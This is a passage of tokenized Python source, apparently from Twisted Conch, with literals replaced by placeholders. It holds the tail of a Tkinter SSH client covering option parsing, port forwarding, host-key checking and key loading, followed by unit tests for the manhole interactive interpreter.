showerror ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> finished = <NUM_LIT:0> <EOL> if escape : <EOL> if escape == '<STR_LIT:none>' : <EOL> options [ '<STR_LIT>' ] = None <EOL> elif escape [ <NUM_LIT:0> ] == '<STR_LIT>' and len ( escape ) == <NUM_LIT:2> : <EOL> options [ '<STR_LIT>' ] = chr ( ord ( escape [ <NUM_LIT:1> ] ) - <NUM_LIT:64> ) <EOL> elif len ( escape ) == <NUM_LIT:1> : <EOL> options [ '<STR_LIT>' ] = escape <EOL> elif finished : <EOL> tkMessageBox . showerror ( '<STR_LIT>' , "<STR_LIT>" % escape ) <EOL> finished = <NUM_LIT:0> <EOL> if self . identity . get ( ) : <EOL> options . identitys . append ( self . identity . get ( ) ) <EOL> for line in self . forwards . get ( <NUM_LIT:0> , Tkinter . END ) : <EOL> if line [ <NUM_LIT:0> ] == '<STR_LIT:L>' : <EOL> options . opt_localforward ( line [ <NUM_LIT:2> : ] ) <EOL> else : <EOL> options . opt_remoteforward ( line [ <NUM_LIT:2> : ] ) <EOL> if '<STR_LIT:@>' in options [ '<STR_LIT:host>' ] : <EOL> options [ '<STR_LIT:user>' ] , options [ '<STR_LIT:host>' ] = options [ '<STR_LIT:host>' ] . split ( '<STR_LIT:@>' , <NUM_LIT:1> ) <EOL> if ( not options [ '<STR_LIT:host>' ] or not options [ '<STR_LIT:user>' ] ) and finished : <EOL> tkMessageBox . showerror ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> finished = <NUM_LIT:0> <EOL> if finished : <EOL> self . master . quit ( ) <EOL> self . master . destroy ( ) <EOL> if options [ '<STR_LIT>' ] : <EOL> realout = sys . stdout <EOL> log . startLogging ( sys . stderr ) <EOL> sys . stdout = realout <EOL> else : <EOL> log . discardLogs ( ) <EOL> log . deferr = handleError <EOL> if not options . identitys : <EOL> options . identitys = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> host = options [ '<STR_LIT:host>' ] <EOL> port = int ( options [ '<STR_LIT:port>' ] or <NUM_LIT> ) <EOL> log . msg ( ( host , port ) ) <EOL> reactor . connectTCP ( host , port , SSHClientFactory ( ) ) <EOL> frame . master . deiconify ( ) <EOL> frame . master . 
title ( '<STR_LIT>' % ( options [ '<STR_LIT:user>' ] , options [ '<STR_LIT:host>' ] ) ) <EOL> else : <EOL> self . focus ( ) <EOL> class GeneralOptions ( usage . Options ) : <EOL> synopsis = """<STR_LIT>""" <EOL> optParameters = [ [ '<STR_LIT:user>' , '<STR_LIT:l>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:e>' , '<STR_LIT>' , "<STR_LIT>" ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:c>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:m>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:port>' , '<STR_LIT:p>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:L>' , None , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:R>' , None , '<STR_LIT>' ] , <EOL> ] <EOL> optFlags = [ [ '<STR_LIT>' , '<STR_LIT:t>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:T>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT:version>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:C>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:N>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:s>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:v>' , '<STR_LIT>' ] , <EOL> [ '<STR_LIT>' , '<STR_LIT:a>' , '<STR_LIT>' ] ] <EOL> _ciphers = transport . SSHClientTransport . supportedCiphers <EOL> _macs = transport . SSHClientTransport . supportedMACs <EOL> compData = usage . Completions ( <EOL> mutuallyExclusive = [ ( "<STR_LIT>" , "<STR_LIT>" ) ] , <EOL> optActions = { <EOL> "<STR_LIT>" : usage . CompleteList ( _ciphers ) , <EOL> "<STR_LIT>" : usage . CompleteList ( _macs ) , <EOL> "<STR_LIT>" : usage . Completer ( descr = "<STR_LIT>" ) , <EOL> "<STR_LIT>" : usage . Completer ( descr = "<STR_LIT>" ) } , <EOL> extraActions = [ usage . CompleteUserAtHost ( ) , <EOL> usage . Completer ( descr = "<STR_LIT>" ) , <EOL> usage . Completer ( descr = "<STR_LIT>" , repeat = True ) ] <EOL> ) <EOL> identitys = [ ] <EOL> localForwards = [ ] <EOL> remoteForwards = [ ] <EOL> def opt_identity ( self , i ) : <EOL> self . 
identitys . append ( i ) <EOL> def opt_localforward ( self , f ) : <EOL> localPort , remoteHost , remotePort = f . split ( '<STR_LIT::>' ) <EOL> localPort = int ( localPort ) <EOL> remotePort = int ( remotePort ) <EOL> self . localForwards . append ( ( localPort , ( remoteHost , remotePort ) ) ) <EOL> def opt_remoteforward ( self , f ) : <EOL> remotePort , connHost , connPort = f . split ( '<STR_LIT::>' ) <EOL> remotePort = int ( remotePort ) <EOL> connPort = int ( connPort ) <EOL> self . remoteForwards . append ( ( remotePort , ( connHost , connPort ) ) ) <EOL> def opt_compress ( self ) : <EOL> SSHClientTransport . supportedCompressions [ <NUM_LIT:0> : <NUM_LIT:1> ] = [ '<STR_LIT>' ] <EOL> def parseArgs ( self , * args ) : <EOL> if args : <EOL> self [ '<STR_LIT:host>' ] = args [ <NUM_LIT:0> ] <EOL> self [ '<STR_LIT>' ] = '<STR_LIT:U+0020>' . join ( args [ <NUM_LIT:1> : ] ) <EOL> else : <EOL> self [ '<STR_LIT:host>' ] = '<STR_LIT>' <EOL> self [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> options = None <EOL> menu = None <EOL> exitStatus = <NUM_LIT:0> <EOL> frame = None <EOL> def deferredAskFrame ( question , echo ) : <EOL> if frame . callback : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> d = defer . Deferred ( ) <EOL> resp = [ ] <EOL> def gotChar ( ch , resp = resp ) : <EOL> if not ch : return <EOL> if ch == '<STR_LIT>' : <EOL> reactor . stop ( ) <EOL> if ch == '<STR_LIT:\r>' : <EOL> frame . write ( '<STR_LIT:\r\n>' ) <EOL> stresp = '<STR_LIT>' . join ( resp ) <EOL> del resp <EOL> frame . callback = None <EOL> d . callback ( stresp ) <EOL> return <EOL> elif <NUM_LIT:32> <= ord ( ch ) < <NUM_LIT> : <EOL> resp . append ( ch ) <EOL> if echo : <EOL> frame . write ( ch ) <EOL> elif ord ( ch ) == <NUM_LIT:8> and resp : <EOL> if echo : frame . write ( '<STR_LIT>' ) <EOL> resp . pop ( ) <EOL> frame . callback = gotChar <EOL> frame . write ( question ) <EOL> frame . canvas . focus_force ( ) <EOL> return d <EOL> def run ( ) : <EOL> global menu , options , frame <EOL> args = sys . 
argv [ <NUM_LIT:1> : ] <EOL> if '<STR_LIT>' in args : <EOL> i = args . index ( '<STR_LIT>' ) <EOL> args = args [ i : i + <NUM_LIT:2> ] + args <EOL> del args [ i + <NUM_LIT:2> : i + <NUM_LIT:4> ] <EOL> for arg in args [ : ] : <EOL> try : <EOL> i = args . index ( arg ) <EOL> if arg [ : <NUM_LIT:2> ] == '<STR_LIT>' and args [ i + <NUM_LIT:1> ] [ <NUM_LIT:0> ] != '<STR_LIT:->' : <EOL> args [ i : i + <NUM_LIT:2> ] = [ ] <EOL> except ValueError : <EOL> pass <EOL> root = Tkinter . Tk ( ) <EOL> root . withdraw ( ) <EOL> top = Tkinter . Toplevel ( ) <EOL> menu = TkConchMenu ( top ) <EOL> menu . pack ( side = Tkinter . TOP , fill = Tkinter . BOTH , expand = <NUM_LIT:1> ) <EOL> options = GeneralOptions ( ) <EOL> try : <EOL> options . parseOptions ( args ) <EOL> except usage . UsageError , u : <EOL> print '<STR_LIT>' % u <EOL> options . opt_help ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> for k , v in options . items ( ) : <EOL> if v and hasattr ( menu , k ) : <EOL> getattr ( menu , k ) . insert ( Tkinter . END , v ) <EOL> for ( p , ( rh , rp ) ) in options . localForwards : <EOL> menu . forwards . insert ( Tkinter . END , '<STR_LIT>' % ( p , rh , rp ) ) <EOL> options . localForwards = [ ] <EOL> for ( p , ( rh , rp ) ) in options . remoteForwards : <EOL> menu . forwards . insert ( Tkinter . END , '<STR_LIT>' % ( p , rh , rp ) ) <EOL> options . remoteForwards = [ ] <EOL> frame = tkvt100 . VT100Frame ( root , callback = None ) <EOL> root . geometry ( '<STR_LIT>' % ( tkvt100 . fontWidth * frame . width + <NUM_LIT:3> , tkvt100 . fontHeight * frame . height + <NUM_LIT:3> ) ) <EOL> frame . pack ( side = Tkinter . TOP ) <EOL> tksupport . install ( root ) <EOL> root . withdraw ( ) <EOL> if ( options [ '<STR_LIT:host>' ] and options [ '<STR_LIT:user>' ] ) or '<STR_LIT:@>' in options [ '<STR_LIT:host>' ] : <EOL> menu . doConnect ( ) <EOL> else : <EOL> top . mainloop ( ) <EOL> reactor . run ( ) <EOL> sys . exit ( exitStatus ) <EOL> def handleError ( ) : <EOL> from twisted . 
python import failure <EOL> global exitStatus <EOL> exitStatus = <NUM_LIT:2> <EOL> log . err ( failure . Failure ( ) ) <EOL> reactor . stop ( ) <EOL> raise <EOL> class SSHClientFactory ( protocol . ClientFactory ) : <EOL> noisy = <NUM_LIT:1> <EOL> def stopFactory ( self ) : <EOL> reactor . stop ( ) <EOL> def buildProtocol ( self , addr ) : <EOL> return SSHClientTransport ( ) <EOL> def clientConnectionFailed ( self , connector , reason ) : <EOL> tkMessageBox . showwarning ( '<STR_LIT>' , '<STR_LIT>' % ( reason . type , reason . value ) ) <EOL> class SSHClientTransport ( transport . SSHClientTransport ) : <EOL> def receiveError ( self , code , desc ) : <EOL> global exitStatus <EOL> exitStatus = '<STR_LIT>' % ( code , desc ) <EOL> def sendDisconnect ( self , code , reason ) : <EOL> global exitStatus <EOL> exitStatus = '<STR_LIT>' % ( code , reason ) <EOL> transport . SSHClientTransport . sendDisconnect ( self , code , reason ) <EOL> def receiveDebug ( self , alwaysDisplay , message , lang ) : <EOL> global options <EOL> if alwaysDisplay or options [ '<STR_LIT>' ] : <EOL> log . msg ( '<STR_LIT>' % message ) <EOL> def verifyHostKey ( self , pubKey , fingerprint ) : <EOL> goodKey = isInKnownHosts ( options [ '<STR_LIT:host>' ] , pubKey , { '<STR_LIT>' : None } ) <EOL> if goodKey == <NUM_LIT:1> : <EOL> return defer . succeed ( <NUM_LIT:1> ) <EOL> elif goodKey == <NUM_LIT:2> : <EOL> return defer . fail ( error . ConchError ( '<STR_LIT>' ) ) <EOL> else : <EOL> if options [ '<STR_LIT:host>' ] == self . transport . getPeer ( ) [ <NUM_LIT:1> ] : <EOL> host = options [ '<STR_LIT:host>' ] <EOL> khHost = options [ '<STR_LIT:host>' ] <EOL> else : <EOL> host = '<STR_LIT>' % ( options [ '<STR_LIT:host>' ] , <EOL> self . transport . getPeer ( ) [ <NUM_LIT:1> ] ) <EOL> khHost = '<STR_LIT>' % ( options [ '<STR_LIT:host>' ] , <EOL> self . transport . getPeer ( ) [ <NUM_LIT:1> ] ) <EOL> keyType = common . 
getNS ( pubKey ) [ <NUM_LIT:0> ] <EOL> ques = """<STR_LIT>""" % ( host , <EOL> { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } [ keyType ] , <EOL> fingerprint ) <EOL> ques += '<STR_LIT>' <EOL> return deferredAskFrame ( ques , <NUM_LIT:1> ) . addCallback ( self . _cbVerifyHostKey , pubKey , khHost , keyType ) <EOL> def _cbVerifyHostKey ( self , ans , pubKey , khHost , keyType ) : <EOL> if ans . lower ( ) not in ( '<STR_LIT:yes>' , '<STR_LIT>' ) : <EOL> return deferredAskFrame ( "<STR_LIT>" , <NUM_LIT:1> ) . addCallback ( self . _cbVerifyHostKey , pubKey , khHost , keyType ) <EOL> if ans . lower ( ) == '<STR_LIT>' : <EOL> frame . write ( '<STR_LIT>' ) <EOL> raise error . ConchError ( '<STR_LIT>' ) <EOL> try : <EOL> frame . write ( "<STR_LIT>" % ( khHost , { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } [ keyType ] ) ) <EOL> known_hosts = open ( os . path . expanduser ( '<STR_LIT>' ) , '<STR_LIT:a>' ) <EOL> encodedKey = base64 . encodestring ( pubKey ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> known_hosts . write ( '<STR_LIT>' % ( khHost , keyType , encodedKey ) ) <EOL> known_hosts . close ( ) <EOL> except : <EOL> log . deferr ( ) <EOL> raise error . ConchError <EOL> def connectionSecure ( self ) : <EOL> if options [ '<STR_LIT:user>' ] : <EOL> user = options [ '<STR_LIT:user>' ] <EOL> else : <EOL> user = getpass . getuser ( ) <EOL> self . requestService ( SSHUserAuthClient ( user , SSHConnection ( ) ) ) <EOL> class SSHUserAuthClient ( userauth . SSHUserAuthClient ) : <EOL> usedFiles = [ ] <EOL> def getPassword ( self , prompt = None ) : <EOL> if not prompt : <EOL> prompt = "<STR_LIT>" % ( self . user , options [ '<STR_LIT:host>' ] ) <EOL> return deferredAskFrame ( prompt , <NUM_LIT:0> ) <EOL> def getPublicKey ( self ) : <EOL> files = [ x for x in options . identitys if x not in self . usedFiles ] <EOL> if not files : <EOL> return None <EOL> file = files [ <NUM_LIT:0> ] <EOL> log . msg ( file ) <EOL> self . usedFiles . 
append ( file ) <EOL> file = os . path . expanduser ( file ) <EOL> file += '<STR_LIT>' <EOL> if not os . path . exists ( file ) : <EOL> return <EOL> try : <EOL> return keys . Key . fromFile ( file ) . blob ( ) <EOL> except : <EOL> return self . getPublicKey ( ) <EOL> def getPrivateKey ( self ) : <EOL> file = os . path . expanduser ( self . usedFiles [ - <NUM_LIT:1> ] ) <EOL> if not os . path . exists ( file ) : <EOL> return None <EOL> try : <EOL> return defer . succeed ( keys . Key . fromFile ( file ) . keyObject ) <EOL> except keys . BadKeyError , e : <EOL> if e . args [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> prompt = "<STR_LIT>" % self . usedFiles [ - <NUM_LIT:1> ] <EOL> return deferredAskFrame ( prompt , <NUM_LIT:0> ) . addCallback ( self . _cbGetPrivateKey , <NUM_LIT:0> ) <EOL> def _cbGetPrivateKey ( self , ans , count ) : <EOL> file = os . path . expanduser ( self . usedFiles [ - <NUM_LIT:1> ] ) <EOL> try : <EOL> return keys . Key . fromFile ( file , password = ans ) . keyObject <EOL> except keys . BadKeyError : <EOL> if count == <NUM_LIT:2> : <EOL> raise <EOL> prompt = "<STR_LIT>" % self . usedFiles [ - <NUM_LIT:1> ] <EOL> return deferredAskFrame ( prompt , <NUM_LIT:0> ) . addCallback ( self . _cbGetPrivateKey , count + <NUM_LIT:1> ) <EOL> class SSHConnection ( connection . SSHConnection ) : <EOL> def serviceStarted ( self ) : <EOL> if not options [ '<STR_LIT>' ] : <EOL> self . openChannel ( SSHSession ( ) ) <EOL> if options . localForwards : <EOL> for localPort , hostport in options . localForwards : <EOL> reactor . listenTCP ( localPort , <EOL> forwarding . SSHListenForwardingFactory ( self , <EOL> hostport , <EOL> forwarding . SSHListenClientForwardingChannel ) ) <EOL> if options . remoteForwards : <EOL> for remotePort , hostport in options . remoteForwards : <EOL> log . msg ( '<STR_LIT>' % <EOL> ( remotePort , hostport ) ) <EOL> data = forwarding . packGlobal_tcpip_forward ( <EOL> ( '<STR_LIT>' , remotePort ) ) <EOL> self . 
sendGlobalRequest ( '<STR_LIT>' , data ) <EOL> self . remoteForwards [ remotePort ] = hostport <EOL> class SSHSession ( channel . SSHChannel ) : <EOL> name = '<STR_LIT>' <EOL> def channelOpen ( self , foo ) : <EOL> self . escapeMode = <NUM_LIT:1> <EOL> c = session . SSHSessionClient ( ) <EOL> if options [ '<STR_LIT>' ] : <EOL> c . dataReceived = self . handleInput <EOL> else : <EOL> c . dataReceived = self . write <EOL> c . connectionLost = self . sendEOF <EOL> frame . callback = c . dataReceived <EOL> frame . canvas . focus_force ( ) <EOL> if options [ '<STR_LIT>' ] : <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , common . NS ( options [ '<STR_LIT>' ] ) ) <EOL> elif options [ '<STR_LIT>' ] : <EOL> if options [ '<STR_LIT>' ] : <EOL> term = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> winSize = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ptyReqData = session . packRequest_pty_req ( term , winSize , '<STR_LIT>' ) <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , ptyReqData ) <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , common . NS ( options [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> if not options [ '<STR_LIT>' ] : <EOL> term = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> winSize = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ptyReqData = session . packRequest_pty_req ( term , winSize , '<STR_LIT>' ) <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , ptyReqData ) <EOL> self . conn . sendRequest ( self , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . conn . transport . transport . setTcpNoDelay ( <NUM_LIT:1> ) <EOL> def handleInput ( self , char ) : <EOL> if char in ( '<STR_LIT:\n>' , '<STR_LIT:\r>' ) : <EOL> self . escapeMode = <NUM_LIT:1> <EOL> self . write ( char ) <EOL> elif self . escapeMode == <NUM_LIT:1> and char == options [ '<STR_LIT>' ] : <EOL> self . escapeMode = <NUM_LIT:2> <EOL> elif self . escapeMode == <NUM_LIT:2> : <EOL> self . 
escapeMode = <NUM_LIT:1> <EOL> if char == '<STR_LIT:.>' : <EOL> log . msg ( '<STR_LIT>' ) <EOL> reactor . stop ( ) <EOL> return <EOL> elif char == '<STR_LIT>' : <EOL> os . kill ( os . getpid ( ) , signal . SIGSTOP ) <EOL> return <EOL> elif char == '<STR_LIT:R>' : <EOL> log . msg ( '<STR_LIT>' ) <EOL> self . conn . transport . sendKexInit ( ) <EOL> return <EOL> self . write ( '<STR_LIT>' + char ) <EOL> else : <EOL> self . escapeMode = <NUM_LIT:0> <EOL> self . write ( char ) <EOL> def dataReceived ( self , data ) : <EOL> if options [ '<STR_LIT>' ] : <EOL> print repr ( data ) <EOL> frame . write ( data ) <EOL> def extReceived ( self , t , data ) : <EOL> if t == connection . EXTENDED_DATA_STDERR : <EOL> log . msg ( '<STR_LIT>' % len ( data ) ) <EOL> sys . stderr . write ( data ) <EOL> sys . stderr . flush ( ) <EOL> def eofReceived ( self ) : <EOL> log . msg ( '<STR_LIT>' ) <EOL> sys . stdin . close ( ) <EOL> def closed ( self ) : <EOL> log . msg ( '<STR_LIT>' % self ) <EOL> if len ( self . conn . channels ) == <NUM_LIT:1> : <EOL> reactor . stop ( ) <EOL> def request_exit_status ( self , data ) : <EOL> global exitStatus <EOL> exitStatus = int ( struct . unpack ( '<STR_LIT>' , data ) [ <NUM_LIT:0> ] ) <EOL> log . msg ( '<STR_LIT>' % exitStatus ) <EOL> def sendEOF ( self ) : <EOL> self . conn . sendEOF ( self ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run ( ) </s>
<s> """<STR_LIT>""" <EOL> import traceback <EOL> from twisted . trial import unittest <EOL> from twisted . internet import error , defer <EOL> from twisted . test . proto_helpers import StringTransport <EOL> from twisted . conch . test . test_recvline import _TelnetMixin , _SSHMixin , _StdioMixin , stdio , ssh <EOL> from twisted . conch import manhole <EOL> from twisted . conch . insults import insults <EOL> def determineDefaultFunctionName ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> <NUM_LIT:1> // <NUM_LIT:0> <EOL> except : <EOL> return traceback . extract_stack ( ) [ - <NUM_LIT:2> ] [ <NUM_LIT:2> ] <EOL> defaultFunctionName = determineDefaultFunctionName ( ) <EOL> class ManholeInterpreterTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_resetBuffer ( self ) : <EOL> """<STR_LIT>""" <EOL> interpreter = manhole . ManholeInterpreter ( None ) <EOL> interpreter . buffer . extend ( [ "<STR_LIT:1>" , "<STR_LIT:2>" ] ) <EOL> interpreter . resetBuffer ( ) <EOL> self . assertFalse ( interpreter . buffer ) <EOL> class ManholeProtocolTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_interruptResetsInterpreterBuffer ( self ) : <EOL> """<STR_LIT>""" <EOL> transport = StringTransport ( ) <EOL> terminal = insults . ServerProtocol ( manhole . Manhole ) <EOL> terminal . makeConnection ( transport ) <EOL> protocol = terminal . terminalProtocol <EOL> interpreter = protocol . interpreter <EOL> interpreter . buffer . extend ( [ "<STR_LIT:1>" , "<STR_LIT:2>" ] ) <EOL> protocol . handle_INT ( ) <EOL> self . assertFalse ( interpreter . buffer ) <EOL> class WriterTests ( unittest . TestCase ) : <EOL> def testInteger ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT:1>" ) <EOL> def testDoubleQuoteString ( self ) : <EOL> manhole . lastColorizedLine ( '<STR_LIT>' ) <EOL> def testSingleQuoteString ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testTripleSingleQuotedString ( self ) : <EOL> manhole . 
lastColorizedLine ( "<STR_LIT>" ) <EOL> def testTripleDoubleQuotedString ( self ) : <EOL> manhole . lastColorizedLine ( '<STR_LIT>' ) <EOL> def testFunctionDefinition ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> def testClassDefinition ( self ) : <EOL> manhole . lastColorizedLine ( "<STR_LIT>" ) <EOL> class ManholeLoopbackMixin : <EOL> serverProtocol = manhole . ColoredManhole <EOL> def wfd ( self , d ) : <EOL> return defer . waitForDeferred ( d ) <EOL> def testSimpleExpression ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT:2>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testTripleQuoteLineContinuation ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testFunctionDefinition ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testClassDefinition ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . 
_assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testException ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> '<STR_LIT>' + defaultFunctionName , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def testControlC ( self ) : <EOL> done = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" + manhole . CTRL_C + <EOL> "<STR_LIT>" ) <EOL> def finished ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> return done . addCallback ( finished ) <EOL> def test_interruptDuringContinuation ( self ) : <EOL> """<STR_LIT>""" <EOL> continuing = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> def gotContinuation ( ignored ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> interrupted = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( manhole . CTRL_C ) <EOL> return interrupted <EOL> continuing . addCallback ( gotContinuation ) <EOL> def gotInterruption ( ignored ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> continuing . addCallback ( gotInterruption ) <EOL> return continuing <EOL> def testControlBackslash ( self ) : <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> partialLine = self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> def gotPartialLine ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_BACKSLASH ) <EOL> d = self . recvlineClient . 
onDisconnection <EOL> return self . assertFailure ( d , error . ConnectionDone ) <EOL> def gotClearedLine ( ign ) : <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" ] ) <EOL> return partialLine . addCallback ( gotPartialLine ) . addCallback ( gotClearedLine ) <EOL> @ defer . inlineCallbacks <EOL> def test_controlD ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_D + "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> self . _testwrite ( "<STR_LIT:\n>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( manhole . CTRL_D ) <EOL> d = self . recvlineClient . onDisconnection <EOL> yield self . assertFailure ( d , error . ConnectionDone ) <EOL> @ defer . inlineCallbacks <EOL> def testControlL ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . _testwrite ( manhole . CTRL_L + "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( r"<STR_LIT>" ) <EOL> self . _assertBuffer ( [ "<STR_LIT>" ] ) <EOL> def test_controlA ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT:p>' ) <EOL> d = self . recvlineClient . expect ( '<STR_LIT>' ) <EOL> def cb ( ignore ) : <EOL> self . _assertBuffer ( [ '<STR_LIT>' ] ) <EOL> return d . addCallback ( cb ) <EOL> def test_controlE ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT:p>' + '<STR_LIT>' + '<STR_LIT:">' ) <EOL> d = self . recvlineClient . expect ( '<STR_LIT>' ) <EOL> def cb ( ignore ) : <EOL> self . _assertBuffer ( [ '<STR_LIT>' ] ) <EOL> return d . addCallback ( cb ) <EOL> @ defer . 
inlineCallbacks <EOL> def test_deferred ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testwrite ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> self . _testwrite ( <EOL> "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( "<STR_LIT>" ) <EOL> yield self . recvlineClient . expect ( <EOL> "<STR_LIT>" ) <EOL> self . _assertBuffer ( <EOL> [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> class ManholeLoopbackTelnetTests ( _TelnetMixin , unittest . TestCase , ManholeLoopbackMixin ) : <EOL> pass <EOL> class ManholeLoopbackSSHTests ( _SSHMixin , unittest . TestCase , ManholeLoopbackMixin ) : <EOL> if ssh is None : <EOL> skip = "<STR_LIT>" <EOL> class ManholeLoopbackStdioTests ( _StdioMixin , unittest . TestCase , ManholeLoopbackMixin ) : <EOL> if stdio is None : <EOL> skip = "<STR_LIT>" <EOL> else : <EOL> serverProtocol = stdio . ConsoleManhole </s>
